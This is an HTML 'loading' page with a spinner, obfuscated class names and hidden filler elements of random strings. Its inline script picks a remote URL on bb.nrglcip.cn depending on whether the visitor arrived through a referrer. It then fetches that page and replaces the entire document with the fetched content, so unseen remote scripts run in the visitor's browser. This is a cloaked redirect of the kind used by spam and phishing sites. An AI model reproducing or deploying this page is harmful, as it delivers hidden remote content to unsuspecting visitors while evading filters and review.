<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ch1s0RQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ch1s0RQ .dn7VNk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ch1s0RQ .content {
            line-height: 50px;
            text-align: center
        }

        .Ch1s0RQ .img {
            width: 100%
        }

        .Ch1s0RQ .YGfLWc {
            text-align: center
        }

        .Ch1s0RQ .YGfLWc span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ch1s0RQ .YGfLWc span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ch1s0RQ .YGfLWc span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ch1s0RQ .YGfLWc span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ch1s0RQ .YGfLWc span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ch1s0RQ .YGfLWc span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ch1s0RQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YpA62khQ2SeHq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var AS9uM2 = YpA62khQ2SeHq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ AS9uM2 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ AS9uM2 +".html?a=share";
		}
		
        Wf0EB5ow=url+"#"+new Date().getTime();
        Wf0EB5ow && function() {
            $.get(Wf0EB5ow, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >ldasu5wjD6hHRoDUOw9xSzdALo2PzmawjP9wXZsKEAO</b>
<p  style='display:none'>voAxdxhMoah</p>
<p  style='display:none'>voAxdxhMoah</p>
<p  style='display:none'>voAxdxhMoah</p>
<h1 style='display:none' >CagR6jh3B5JMeBX26s4EzP4Kg8PpSlF</h1>
<li style='display:none' >gmjufisUVUNf9VOy18KE2EFeWjAeDvjOZMOOOF092ytL1UKhB1qoJwvCTxTxun1XEzzjq33PEZfA6GnmJEcXkjdLj8x1g</li><div class="Ch1s0RQ">
    <div class="dn7VNk">
        <div class="YGfLWc">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>R4TLNqbPT17lzRobogFOhAtXqdzK3ynKiTz</a>
<a  href='#' style='display:none'>R4TLNqbPT17lzRobogFOhAtXqdzK3ynKiTz</a>
<ul style='display:none' >bv6k0e4w9arKMjDxugID9lJkhKkLJfXN9rPIbT9UV228yHKC06k1</ul>
<a  href='#' style='display:none'>R4TLNqbPT17lzRobogFOhAtXqdzK3ynKiTz</a></body>
</html>